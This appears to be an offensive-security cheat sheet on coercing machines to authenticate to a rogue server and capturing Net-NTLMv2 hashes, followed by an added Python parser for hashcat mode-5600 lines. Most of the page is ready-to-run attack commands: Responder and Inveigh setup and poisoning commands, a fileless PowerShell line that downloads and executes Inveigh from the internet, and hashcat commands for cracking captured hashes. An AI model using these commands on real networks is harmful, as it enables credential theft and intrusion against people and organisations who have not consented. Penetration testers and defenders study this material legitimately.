PRIMARY CATEGORY → NTLM
Theory
An operator can force or coerce a remote machine into authenticating against a rogue server under the operator's control, in order to capture the corresponding Net-NTLMv2 hash carried in the NTLM Message Type 3 (AUTHENTICATE_MESSAGE).
Abusing from UNIX-like
Responder
Setup
git clone https://github.com/lgandx/Responder Responder
cd !$ && python3 -m venv .venv
. !$/bin/activate && pip3 install -r requirements.txt
Usage
python3 Responder.py --interface <INTERFACE>
Abusing from Windows
Inveigh.ps1
Setup
- Fileless
IEX (New-Object Net.WebClient).downloadString('https://github.com/Kevin-Robertson/Inveigh/raw/refs/heads/master/Inveigh.ps1')
- Touching Disk
IWR -UseBasicParsing -Uri 'https://github.com/Kevin-Robertson/Inveigh/raw/refs/heads/master/Inveigh.ps1' -OutFile '.\Inveigh.ps1'
Import-Module .\Inveigh.ps1
Usage
- Interactive ( 2 ) or RemoteInteractive ( 10 ) Logon Session
  e.g. physical access ( 2 ), RDP ( 10 )
Invoke-Inveigh -ConsoleOutput Y -LLMNR Y -NBNS Y -mDNS Y
- Network Logon Session ( 3 )
  e.g. WinRM, reverse shell, SMB…
Start Server
Invoke-Inveigh -ConsoleOutput N -LLMNR Y -NBNS Y -mDNS Y
Check Status
Get-Inveigh -Status
Retrieve Net-NTLMv2 Hashes
Get-Inveigh -NTLMv2
Stop Server
Stop-Inveigh
Inveigh.exe
.\Inveigh.exe
Cracking Net-NTLMv2 Hashes
Hashcat
Hashcat Type → 5600
hashcat --force -O --attack-mode 0 --hash-type 5600 <HASH> <WORDLIST>
hashcat --force -O --attack-mode 0 --hash-type 5600 <HASH> <WORDLIST> --show
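As an added example, not code from the original page nor from Responder, Inveigh or hashcat: a Python parser for the hashcat mode-5600 line these tools emit, decoding the Type 3 response blob (timestamp, client challenge, target info) so a captured line can be triaged (which host, which domain, when). The sample line, account, host names and hex values are constructed.

```python
import struct
from datetime import datetime, timedelta, timezone

# MsvAv* attribute ids carried in the NTLMv2 target-information block (MS-NLMP 2.2.2.1)
AV_NAMES = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName",
            4: "DnsDomainName", 5: "DnsTreeName", 7: "Timestamp"}

def filetime_to_dt(filetime):
    """FILETIME (100 ns ticks since 1601-01-01 UTC) -> timezone-aware datetime."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=filetime // 10)

def parse_blob(blob):
    """Decode the NTLMv2_CLIENT_CHALLENGE ("blob") that follows NTProofStr in the Type 3 message."""
    resp_type, _hi, _r1, _r2, ts, client_chal, _r3 = struct.unpack_from("<BBHIQ8sI", blob, 0)
    if resp_type != 1:
        raise ValueError("not an NTLMv2 response blob (RespType != 1)")
    pairs, off = {}, 28                     # AV_PAIR list starts after the 28-byte fixed header
    while True:
        av_id, length = struct.unpack_from("<HH", blob, off)
        value = blob[off + 4:off + 4 + length]
        off += 4 + length
        if av_id == 0:                      # MsvAvEOL terminates the list
            break
        name = AV_NAMES.get(av_id, "Av%d" % av_id)
        if av_id == 7:
            pairs[name] = filetime_to_dt(struct.unpack("<Q", value)[0])
        else:                               # names are UTF-16LE; unknown ids are kept as hex
            pairs[name] = value.decode("utf-16-le") if av_id in AV_NAMES else value.hex()
    return {"timestamp": filetime_to_dt(ts), "client_challenge": client_chal, "target_info": pairs}

def parse_5600(line):
    """Split a hashcat mode-5600 line: user::domain:server_challenge:NTProofStr:blob."""
    fields = line.strip().split(":")
    if len(fields) != 6 or fields[1] != "":
        raise ValueError("expected user::domain:challenge:proof:blob")
    user, _, domain, challenge, proof, blob = fields
    if len(challenge) != 16 or len(proof) != 32:
        raise ValueError("server challenge must be 8 bytes and NTProofStr 16 bytes (hex)")
    return {"user": user, "domain": domain, "server_challenge": bytes.fromhex(challenge),
            "nt_proof": bytes.fromhex(proof), "blob": parse_blob(bytes.fromhex(blob))}

def av_pair(av_id, value):
    return struct.pack("<HH", av_id, len(value)) + value
def constructed_sample_line():
    """Synthetic mode-5600 line for the demo: every value here is made up, not a real capture."""
    ts = 133_000_000_000_000_000              # FILETIME for 2022-06-18 04:26:40 UTC
    pairs = (av_pair(2, "CORP".encode("utf-16-le")) + av_pair(1, "DC01".encode("utf-16-le"))
             + av_pair(7, struct.pack("<Q", ts)) + av_pair(0, b""))
    blob = struct.pack("<BBHIQ8sI", 1, 1, 0, 0, ts, b"\x11" * 8, 0) + pairs + b"\x00" * 4
    return "alice::CORP:" + "aa" * 8 + ":" + "bb" * 16 + ":" + blob.hex()
```

The NTProofStr field is an HMAC-MD5 keyed by the account's NT hash over the server challenge and this blob, which is why a captured line is only useful for offline guessing with mode 5600 and cannot be replayed as a pass-the-hash credential.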